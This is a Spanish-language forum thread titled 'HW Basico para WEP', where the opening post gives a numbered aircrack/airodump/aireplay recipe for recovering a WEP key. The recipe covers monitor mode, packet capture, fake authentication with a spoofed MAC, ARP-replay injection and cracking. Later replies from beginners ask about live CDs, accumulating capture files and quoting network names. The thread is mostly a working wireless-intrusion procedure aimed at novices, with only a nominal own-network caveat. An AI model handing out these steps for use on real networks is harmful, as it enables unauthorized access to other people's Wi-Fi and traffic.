Calificación:
  • 1 voto(s) - 5 Media
  • 1
  • 2
  • 3
  • 4
  • 5

[-]
Etiquetas
basico hw wep para

HW Basico para WEP
#1
Aunque es ya un tema muy tocado seguro que a los nuevos les sera muy util.
Voy a poner algo muy rapido sobre la obtencion de la clave WEP de nuesta AP o la de nuestro amigo para que podais hacer la prueba con ellos, ya no esta permitido hacer este tipo de aptos con AP ajenas.


Una vez dentro de troppix "pongo troppix por que es lo que uso" pero existemas lives que quizas cambie algo pero sera mi­nimo, lo importante es que tenga instalodos los drivers de nuestra tarjeta.

Essid = Lampi
Mac ap = 00:01:02:03:04:05
Mac falsa = 00:11:22:33:44:55


1.- airmon.sh start ath0 "ath0" en mi caso.

2.- airodump atho "fichero" "canal, 0=todos" "1=solo ivs 2=cap"
airodump ath0 clave 2 1, estariamos en el canal 2 y guardando las ivs


3.- aireplay -1 -0 -e "el nombre del AP" -a "la mac del AP" -h "la mac que queremos falsificar" ath0
Quedaria algo asi­: aireplay -1 -0 -e Lampi -a 00:01:02:03:04:05 -h 00:11:22:33:44:55 ath0
Con esto de le dicimos al AP que nuestra mac falsa es autentica.

4.- aireplay -3 -b 00:01:02:03:04:05 -h 00:11:22:33:44:55 -x 600 ath0 x es variable a la cantidad que paquetes a enviar.
Con esto espezamos a injectar paquetes veria con que velocidad suben.

5.- Si no lograsemos asociarnos a la AP bajariamos el RATE de esta manera, seria que tenemos una señal muy baja.
iwconfig ath0 rate 1M essid "nombre del AP"

Una vez tengamos los paquetes suficiente solo nos falta pasale esto:

6.- aircrack -x -0 fichero*ivs y si hay bastante nos dara la key en un plis.


Como veis no hay nada mas, solo se complicaria cuando se tratara de una AP dura de roer o las WPA que aun no lo he logrado, que eso es para otro dia.



[Imagen: 0ec0.jpg]
La linea 4 seria aireplay -3 -b xxx -h xxx -x 600 ath0

Si algo expuesto fuese erroneo no dudeis en decirmelo para su modificacion.

-Saludos y buena experiencia.
Responder
#2
Me da miedo preguntar esto.

Pero no se que has dicho ni hecho, podrias explicarmelo por favor?

Estamos hablando en Linux verdad?

Gracias y perdona las molestias
Responder
#3
Este es el procedimiento basico para dar con la clave WEP de un AP, para hacer esto tienes que tener el live de troppix en un cd.

Si es linux, pero no tendras que hacer casi nada, cargar el cd y poner esto comandos y si hay suerte...
Responder
#4
Lo del live de troppix en un cd, me lo bajo del post que hay en este foro, y como lo hago en ejecutable el cd con el live de troppix?

Gracias y perdona las molestias
Responder
#5
Hay que quemar la ISO como siempre, "Nero, Ultraiso, etc..." y lo insertas el unidad y reinicias.

Si no carga tendras que decirle a la BIOS que arranque desde CD.
Responder
#6
Me habras de perdonar pero al bajarmelo me he dado cuenta, y no me he acordado de pedirte disculpas, por la gran tonteria.

Gracias y cuando acabe de bajar lo pruebo.
Responder
#7
Aqui teneis el video de Devine, tenia que ponerlo en mi web ya que fue uno de los primeros que vi cuando empeze en el tema. Wink

Asi que va para los nuevos, no se si se vera en todos los systemas. :-o

http://lampi.awardspace.com/video-wep.html
Responder
#8
hola lampi, cuando pones -e "nombre del ap,¿pasa algo si lo pones Lampi o lampi?¿afecta a algo si la letra esta en mayusculas y la pones normal?
Responder
#9
[quote user="clavedesol" post="11245"]hola lampi, cuando pones -e "nombre del ap,¿pasa algo si lo pones Lampi o lampi?¿afecta a algo si la letra esta en mayusculas y la pones normal?[/quote]

Es una cosa que no he probado, pero esta claro que no es lo mismo:
Lampi=4C616D7069
lampi=6C616D7069
Responder
#10
Es completamente distinto... y si que afecta, al igual que un nombre doble con un espacio, sino no lo metes con comillas, airodump daria error ó simplemente cogeria la primera palabra.
Zero13

"Así como el hierro se oxida por falta de uso, también la inactividad destruye el intelecto.." - Leonardo Da Vinci

Síguenos en TwitterYoutube

Responder
#11
hola tengo unas dudillas

asi a priori parece mu facil el manual pero.. esos comandos q se ponen en la consola del linux? o se necesitan programitas
otra cuestion, supongo q hace falta una targeta q funcione en modo monitor o funciona cualquiera?

si es necesaria una modo monitor me podeis decir alguna q se venda en el corte ingles barata?

sl2
Responder
#12
[quote user="dild0" post="12381"]hola tengo unas dudillas

asi a priori parece mu facil el manual pero.. esos comandos q se ponen en la consola del linux? o se necesitan programitas
otra cuestion, supongo q hace falta una targeta q funcione en modo monitor o funciona cualquiera?

si es necesaria una modo monitor me podeis decir alguna q se venda en el corte ingles barata?

sl2[/quote]

Mejor usa una livecd de las muchas que hay para hw todas hacen lo mismo con mas o menos cantidad de drivers para ponerlas en modo monitor, en el foro tienes una sección de Lives y otra de trajetas con chips compatibles.
Responder
#13
buenas buenas...

me da lata tener que revivir el topic perooo!!!!!

Confusedos:

preguntita newbie ...

mmmmmm estoy corriendo el hax-puppy 1.3 (auspiciado aca en el foro)

todo anda ok ....

pero al estar capturando paquetes ivs .... la captura es acumulativa ??? :hypnotico: me explico... me pongo a escanear en la mañana, pero tengo que salir, despues vuelvo en la noche, enciendo el pc .... puedo continuar escaneando.. y contar con los paquetes capturados en la mañana???

(es que con el aircrack en windows... no era asi, por eso es mi pregunta... solo una duda...)


:plasplas: me impresiono yo mismo .... jejejej agradeceria una ayudadita... poca ...

saludo!!!
Responder
#14
Si la tienes instalada en usb si, y a las capturas le das el mismo nombre, que seria:

Nombre de fichero en airodump "lampi"
Empezaria con lampi-01, cierras.

Nombre de fichero en airodump "lampi"
Empiezria por lampi-02, terminas.

aircrack lampi*.ivs
lampi-01
lampi-02

Buscaria todos los que empiezen por "lampi" pero con la misma mac, bueno al menos eso recuerdo, hace mucho que no la uso, primero la instalar en usb, en modo live no.
Responder
#15
resulta que no me reconocio en el disco usb, asi que lo instale en el HD ....

no habria probleas cierto???
Responder
#16
En principio no, se trata de lamacenarlo en algun soporte que no sea la memoria RAM del equiipo tal y como hacen las LiveCds con sus datos.
Responder
#17
salu2 a to2 de este gran foro.... mi preguntita es la siguiente espero me puedan ayudar, tengo una tarjeta red trendnet inalambrica a la cual le puse el driver atheros4229, les cuento ke me baje el aircrack pa windows ke viene con su airodum y otras cosas mas, la cosa es ke cuando enpieso a recibir y emitir los paketes no me aparecen las IVs de un router de mi amigo, hago todos los pasos ke airodum me dice y salen correctos pero no puedo capturar IVs. hay algun otro soft para windows parecido a este?
Responder
#18
Te recomiendo descargues la oltima versión de algunas de las LiveCD de HW que hay disponibles.
Responder
#19
Zero13 escribió:Es completamente distinto... y si que afecta, al igual que un nombre doble con un espacio, sino no lo metes con comillas, airodump daria error ó simplemente cogeria la primera palabra.

Perdonad que retome este hilo, pero es precisamente eso , lo que me tiene loco, pongamos un ejemplo , con el nombre de la red, pico pata , seria :

airodump-ng -e "pico pata" , (aestas comillas te refieres Zero13) o ,
airodump-ng -e pico"pata , (asi?? ) .

Aclararme esto por favor.

Un saludo.
Responder
#20
La 1ª ;-)
Responder


Posibles temas similares...
Tema Autor Respuestas Vistas Último mensaje
  Listado y caracteristicas de tarjetas para HW - pon la tuya. kezon 28 14,617 18-06-2014, 19:28
Último mensaje: Alatriste31
  COMMVIEW 5.x - Modo Monitor para las IPW2200 kezon 49 16,661 24-08-2008, 18:54
Último mensaje: rymo81
  Pequeño diccionario español-ingles-etc para WPA mundodamian 2 4,748 04-05-2008, 03:41
Último mensaje: raulete
  Manual para Wifiway 1.o illohacker 0 1,534 11-02-2008, 17:15
Último mensaje: illohacker
  Respuesta para elberex ( como descifro esto ) mundodamian 2 989 15-12-2007, 06:52
Último mensaje: elberex
  í‚¿Como usar aircrack-ng? Argumentos para la nueva version 0 kezon 4 4,649 13-12-2006, 19:21
Último mensaje: kezon
  Comandos Para Ataques bikford 1 1,025 28-10-2006, 09:42
Último mensaje: Zero13
  Para los de LINUX kezon 1 722 15-09-2006, 01:37
Último mensaje: wallaguest1
  Enlaces de informacion importantes para HW kezon 3 2,969 29-06-2006, 15:47
Último mensaje: kezon
  Manuales importantes para H-W kezon 3 3,571 08-06-2006, 12:14
Último mensaje: kezon

Salto de foro:


Usuarios navegando en este tema: 1 invitado(s)